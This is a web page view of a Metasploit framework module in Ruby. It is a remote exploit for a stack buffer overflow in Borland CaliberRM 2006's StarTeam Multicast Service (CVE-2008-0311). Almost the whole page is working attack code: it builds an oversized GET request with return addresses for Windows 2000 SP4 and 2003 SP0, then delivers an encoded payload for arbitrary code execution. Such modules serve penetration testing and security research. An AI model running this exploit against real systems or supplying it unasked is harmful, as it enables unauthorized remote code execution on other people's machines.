Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/borland_starteam.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Borland CaliberRM StarTeam Multicast Service Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending15a specially crafted GET request to the STMulticastService, an attacker may be16able to execute arbitrary code.17},18'Author' => 'MC',19'References' =>20[21[ 'CVE', '2008-0311' ],22[ 'OSVDB', '44039' ],23[ 'BID', '28602' ],24],25'DefaultOptions' =>26{27'EXITFUNC' => 'process',28},29'Payload' =>30{31'Space' => 600,32'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",33'StackAdjustment' => -3500,34'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",35},36'Platform' => 'win',37'Targets' =>38[39[ 'Windows 2000 SP4 English', { 'Ret' => 0x7c5729db } ],40[ 'Windows 2003 SP0 English', { 'Ret' => 0x71ae1f9b } ],41],42'Privileged' => true,43'DefaultTarget' => 0,44'DisclosureDate' => '2008-04-02'))4546register_options([Opt::RPORT(3057)])47end4849def exploit5051# inline payloads work best!52sploit = rand_text_english(511) + "\x00" + rand_text_english(1020)53sploit << [target.ret].pack('V') + "@" * 156 # <- :(54sploit << payload.encoded + rand_text_english(rand(100) + 1)5556print_status("Trying target #{target.name}...")5758send_request_raw({'uri' => sploit,}, 5)5960handler61disconnect6263end64end656667